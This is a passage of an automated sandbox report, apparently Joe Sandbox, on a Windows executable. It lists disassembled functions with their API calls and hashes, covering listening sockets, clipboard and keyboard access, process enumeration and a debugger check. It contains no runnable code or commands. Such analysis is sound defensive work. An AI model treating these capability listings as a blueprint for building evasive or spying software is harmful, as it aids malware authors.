                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                        • API String ID: 4194297153-14809454
                                                                        • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                        • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                        • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                        • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                        Function 0044EB5F Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 643COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$_strncmp
                                                                        • String ID: @oH$\$^$h
                                                                        • API String ID: 2175499884-3701065813
                                                                        • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                        • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                        • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                        • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                        Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                        • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                                                        • String ID:
                                                                        • API String ID: 540024437-0
                                                                        • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                        • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                        • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                        • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                        Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                        • API String ID: 0-2872873767
                                                                        • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                        • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                        • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                        • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                        Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                        • __wsplitpath.LIBCMT ref: 00475644
                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                        • _wcscat.LIBCMT ref: 00475657
                                                                        • __wcsicoll.LIBCMT ref: 0047567B
                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                        • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                        • String ID:
                                                                        • API String ID: 2547909840-0
                                                                        • Opcode ID: ef541357252d993a4df868a4b3766a9c4de7ab22228c2cbf8f5e37cb3d280287
                                                                        • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                        • Opcode Fuzzy Hash: ef541357252d993a4df868a4b3766a9c4de7ab22228c2cbf8f5e37cb3d280287
                                                                        • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                        Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                        • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                        • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                        • FindClose.KERNEL32(?), ref: 004525FF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                        • String ID: *.*$\VH
                                                                        • API String ID: 2786137511-2657498754
                                                                        • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                        • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                        • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                        • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                        Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                        • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                        • String ID: pqI
                                                                        • API String ID: 2579439406-2459173057
                                                                        • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                        • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                        • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                        • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                        Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __wcsicoll.LIBCMT ref: 00433349
                                                                        • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                        • __wcsicoll.LIBCMT ref: 00433375
                                                                        • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsicollmouse_event
                                                                        • String ID: DOWN
                                                                        • API String ID: 1033544147-711622031
                                                                        • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                        • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                        • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                        • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                        Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                        • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                        • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                        • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: KeyboardMessagePostState$InputSend
                                                                        • String ID:
                                                                        • API String ID: 3031425849-0
                                                                        • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                        • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                        • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                        • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                        Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 4170576061-0
                                                                        • Opcode ID: 8ddbfaba4c2126a023af5507e312a02ed6e7cff796df1806a9b93600bfc1e307
                                                                        • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                        • Opcode Fuzzy Hash: 8ddbfaba4c2126a023af5507e312a02ed6e7cff796df1806a9b93600bfc1e307
                                                                        • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                        Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                        • IsWindowVisible.USER32 ref: 0047A368
                                                                        • IsWindowEnabled.USER32 ref: 0047A378
                                                                        • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                        • IsIconic.USER32 ref: 0047A393
                                                                        • IsZoomed.USER32 ref: 0047A3A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                        • String ID:
                                                                        • API String ID: 292994002-0
                                                                        • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                        • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                        • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                        • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                        Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                        • CloseClipboard.USER32 ref: 0046DD0D
                                                                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                        • CloseClipboard.USER32 ref: 0046DD41
                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                        • CloseClipboard.USER32 ref: 0046DD99
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                        • String ID:
                                                                        • API String ID: 15083398-0
                                                                        • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                        • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                        • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                        • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                        Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: U$\
                                                                        • API String ID: 4104443479-100911408
                                                                        • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                        • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                        • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                        • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                        Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$CloseFirstNext
                                                                        • String ID:
                                                                        • API String ID: 3541575487-0
                                                                        • Opcode ID: f8ec562d354739d1813db85dcf23f13665d7d9b039f732a3c66120ad17a42715
                                                                        • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                        • Opcode Fuzzy Hash: f8ec562d354739d1813db85dcf23f13665d7d9b039f732a3c66120ad17a42715
                                                                        • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                        Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                        • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
